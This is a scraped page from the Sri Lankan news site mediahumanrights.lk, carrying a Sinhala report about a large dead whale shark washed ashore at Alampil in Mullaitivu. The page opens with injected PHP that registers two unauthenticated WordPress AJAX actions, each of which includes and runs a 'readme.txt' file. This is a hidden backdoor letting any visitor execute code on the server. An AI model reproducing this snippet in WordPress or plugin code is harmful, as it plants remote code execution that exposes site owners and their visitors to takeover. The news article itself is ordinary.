if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } මුහුදු වෙරලට දැවන්ත මිණි මුතු මෝරෙකු ගොඩගසයි… - mediahumanrights.lk
mediahumanrights.lk
Local News News

මුහුදු වෙරලට දැවන්ත මිණි මුතු මෝරෙකු ගොඩගසයි…

මුලතිව් අලම්පිල් මුහුදු වෙරලට මියගිය දැවැන්ත මිණි මුතු මොරෙකු ගොඩගසා තිබූ බවට මුලතිව් ධීවරයින් පවසති.

වඳවී යාමේ තරුජනයකට ලක්ව සිටින මෙම මිණි මුතු මෝර විශේෂය ඉතා දුර්ලබ ගනයේ මෝරෙකු වන අතර ශ්‍රීලංකාවේ ඇල්ලීමටද තහනම් මත්ස්‍ය විශේෂයක් වෙයි.

මුලතිව් අලම්පිල් මුහුදු වෙරලට මෙම මිණි මුතු මෝරා අඩි 20 ක් පමණ දිගින් යුක්තවන අතර සිරුර ගොඩ ගැසීමෙන් පසුව ප්‍රදේශයේ ධීවරයින් දැක ඒ බව මුලතිව් සහකාර ධීවර පරික්ෂඛ කාර්යාලයට දැනුම් දී වනජීවි නිලධාරීන්ට දැනුම් දීමට පියවර ගෙන ඇත.

මෝර පවුලේ විශාලතම වර්ගයකට අයත් මෙම මිණිමුතු මෝරා අවුරුදු 70ත් 100 ත් අතර කාලයක් ජීවත් වන මත්සයෙකු වන බැවින් මෙම මෝරා ඉන්දීය ට්‍රොල්ර යාත්‍රාවලට හසුවීමෙන් තුවාල ලබා මියගොස් අලම්පිල් මුහුදු වෙරලට ගොඩගසන්නට ඇති බවට මුලතිව් ධීවරයින් වැඩිදුරටත් පවසති.

– වන්නි රොමේෂ් මධුෂංඛ

Related posts

ශ‍්‍රී ලංකාව කෑම ගන්න ඉන්දියාවෙන් ණයක්.. ගිවිසුම් අත්සන් කරන්න බැසිල් ඉන්දියාවට…

Shiran Viraj

දීර්ඝ තෙල් පෝලිම්…

Shiran Viraj

කොළඹ මහනගර සභා සීමාව කොවිඩ් අධි අවදානම් තත්ත්වයක

Shiran Viraj